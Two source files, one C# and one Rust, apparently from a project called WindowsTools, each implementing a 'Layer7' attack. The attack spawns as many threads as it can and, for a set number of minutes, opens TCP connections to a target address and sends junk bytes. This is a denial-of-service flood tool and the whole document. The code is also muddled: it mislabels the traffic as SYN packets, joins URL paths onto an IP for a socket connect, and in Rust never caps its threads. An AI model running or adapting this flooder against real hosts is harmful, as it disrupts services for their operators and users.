File: WindowsTools/WindowsTools/src/attacks/Layer7.cs
using System;
using System.Net.Sockets;
using System.Threading;
using WindowsTools.utils;

namespace WindowsTools.attacks
{
    public class Layer7
    {
        private static readonly int MaxThreads = SystemResources.CalculateMaxThreads();
        private static int _runningThreads;

        public static void StartAttack(string ip, int port, string[] paths, int executionMinutes)
        {
            var rand = new Random();
            var endTime = DateTime.Now.AddMinutes(executionMinutes);

            try
            {
                while (DateTime.Now < endTime)
                {
                    if (_runningThreads < MaxThreads)
                    {
                        var randomIndex = rand.Next(0, paths.Length);

                        var thread = new Thread(() =>
                        {
                            Interlocked.Increment(ref _runningThreads);
                            SendSyn(ip + paths[randomIndex], port);
                            Interlocked.Decrement(ref _runningThreads);
                        });

                        thread.Start();
                    }
                    else
                    {
                        Thread.Sleep(100);
                    }
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine("Error: " + ex.Message);
            }
        }

        private static void SendSyn(string targetIp, int targetPort)
        {
            try
            {
                var socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                socket.Connect(targetIp, targetPort);
                socket.Send(new byte[10]);
                socket.Close();
            }
            catch (Exception ex)
            {
                Console.WriteLine("Error: " + ex.Message);
            }
        }
    }
}

File: windows_tools/src/attacks/layer_7.rs
use std::sync::atomic::{AtomicUsize, Ordering};
use std::io::Write;
use std::net::TcpStream;
use std::thread;
use std::time::{Duration, Instant};
use rand::Rng;
use crate::utils::system_resources::SystemResources;

pub struct Layer7 {
    running_threads: AtomicUsize,
}

impl Layer7 {
    pub fn new() -> Self {
        Layer7 {
            running_threads: AtomicUsize::new(0),
        }
    }

    pub fn start_attack(ip: &str, port: u16, paths: Vec<&str>, execution_minutes: u64) {
        let layer7 = Layer7::new();
        let end_time = Instant::now() + Duration::from_secs(execution_minutes * 60);

        loop {
            if Instant::now() >= end_time {
                break;
            }

            let max_threads = SystemResources::calculate_max_threads();
            if layer7.running_threads() < max_threads {
                let ip_clone = ip.to_string();
                let paths_clone = paths.clone();
                let layer7_clone = Layer7::new(); // Crear una nueva instancia de Layer7
                let target_ip = format!("{}{}", ip_clone, paths_clone[rand::thread_rng().gen_range(0..paths_clone.len())]);
                thread::spawn(move || {
                    layer7_clone.increment_running_threads();
                    Layer7::send_syn(&target_ip, port);
                    layer7_clone.decrement_running_threads();
                });
            } else {
                thread::sleep(Duration::from_millis(100));
            }
        }
    }

    fn send_syn(target_ip: &str, target_port: u16) {
        match TcpStream::connect((target_ip, target_port)) {
            Ok(mut stream) => {
                // Enviar SYN
                stream.write(&[0; 10]).expect("Error al enviar SYN");
            },
            Err(e) => {
                println!("Error: {}", e);
            }
        }
    }

    fn running_threads(&self) -> usize {
        self.running_threads.load(Ordering::SeqCst)
    }

    fn increment_running_threads(&self) {
        self.running_threads.fetch_add(1, Ordering::SeqCst);
    }

    fn decrement_running_threads(&self) {
        self.running_threads.fetch_sub(1, Ordering::SeqCst);
    }
}
